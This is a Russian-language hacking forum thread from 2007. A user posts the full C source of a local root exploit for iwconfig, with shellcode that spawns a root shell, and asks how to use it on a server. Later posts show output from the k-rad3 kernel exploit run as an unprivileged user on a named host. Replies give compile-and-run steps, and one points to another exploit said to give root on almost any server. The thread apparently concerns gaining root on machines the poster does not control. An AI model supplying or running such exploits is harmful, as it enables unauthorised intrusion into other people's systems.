Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   Root сплоит (https://forum.antichat.xyz/showthread.php?t=35746)

~GroM~ 17.03.2007 19:20

Root сплоит
 
здравствуйте вот тут есть такой сплоит


/*
Name: iw-config.c
Copyright: !sh2k+!tc2k
Author: heka
Date: 11/11/2003
Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode, dunric, termid, kewlcat, JiNKS
Description: /sbin/iwconfig - local root exploit
iwconfig manipulate the basic wireless parameters

*/

#include <stdio.h>

#define BIN "/sbin/iwconfig"

unsigned char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x13\xcd\x80\x31\xc0\xb0\ x2e"
"\xcd\x0\x31\xc0\x53\x68\x77\x30\x30\x74\x89\x e3"
"\xb0\x27\xcd\x80\x30\xc0\xb0\x3d\xcd\x80\x31\ xc0"
"\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\ x2f"
"\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\ xdb"
"\x6a\x2e\x89\xe3\xb1\x3d\xcd\x80\x31\xc0\x31\ xdb"
"\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\ x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\ xcd"
"\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";

int
main ()
{
int x;
char buf[97], out[13321], *buffer;
unsigned long ret_add = 0xbffffbb8, *add_ptr ;
buffer = buf;
add_ptr = (long *)buffer;
for (x=0; x<97-1; x+=4)
*(add_ptr++)=ret_add;
memset ((char *)out, 0x90, 1337);
memcpy ((char *)out + 333, shellcode, strlen(shellcode));
memcpy((char *)out, "OUT=", 4);
putenv(out);
execl (BIN, BIN, buf, NULL);
return 0;
}
я его скомпилил на сервере у меня получилося сейчас вопрос как с ним работать ?

gcc 17.03.2007 19:24

Во-первых не туда отпостил, для сплойтов есть спец тема выше.
Как работать - запускай получившийся бинарник =)

~GroM~ 17.03.2007 19:33

как именно запускать ?

~GroM~ 17.03.2007 19:35

да и еще одно как запускать вот этот сплоит k-rad3.c кто может помогите стукните в 924607
запускаю вроде все правильо

bash-2.05b$ ./k-rad3 -t 1 -p 2
←[1;30m[ ←[1;37m k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ←[1;30m ]←[0m
←[1;30m[ ←[1;37mDiscovered Jan 2005 by sd <sd@fucksheep.org>←[1;30m ]←[0m
←[1;30m[ ←[1;37mModified 2005/9 by alert7 <alert7@xfocus.org>←[1;30m ]←[0m
[+] try open /proc/cpuinfo .. ok!!
[+] find cpu flag pse in /proc/cpuinfo
[+] CONFIG_X86_PAE :none
[+] Cpu flag: pse ok
[+] Exploit Way : 0
[+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 + n)
[+] thread_size 1 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192
epoll_wait: Invalid argument
Linux landing.captainserver.net 2.6.8-022stab070.4-enterprise #1 SMP Mon Mar 6
5:28:36 MSK 2006 i686 athlon i386 GNU/Linux
[+] idtr.base 0xffff4000 ,base 0xc0000000
[+] kwrite base 0xc0000000, buf 0xbffed7e0,num 8196
[-] This kernel not vulnerability!!!
bash-2.05b$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
bash-2.05b$

но что то ни чего не выходит

limpompo 17.03.2007 19:54

Цитата:

+] idtr.base 0xffff4000 ,base 0xc0000000
[+] kwrite base 0xc0000000, buf 0xbffed7e0,num 8196
[-] This kernel not vulnerability!!!
Всё и так написано Kernel not vulnerability.....

~GroM~ 17.03.2007 20:17

Спасибо а вообще запускал правильно? и еще одно как первый сплоит юзать

gcc 18.03.2007 00:50

Ну тогда уж gcc iw-config.c -o iw-config
./iw-config

+toxa+ 18.03.2007 14:48

ультросплоент
http://xpl.jino-net.ru/gcc343prior.c
даёт права uid=0(root) gid=0(root) почти на любом серваке

гавносплойт=\

~GroM~ 19.03.2007 13:46

спасибо тоха с меня плюс


Время: 11:49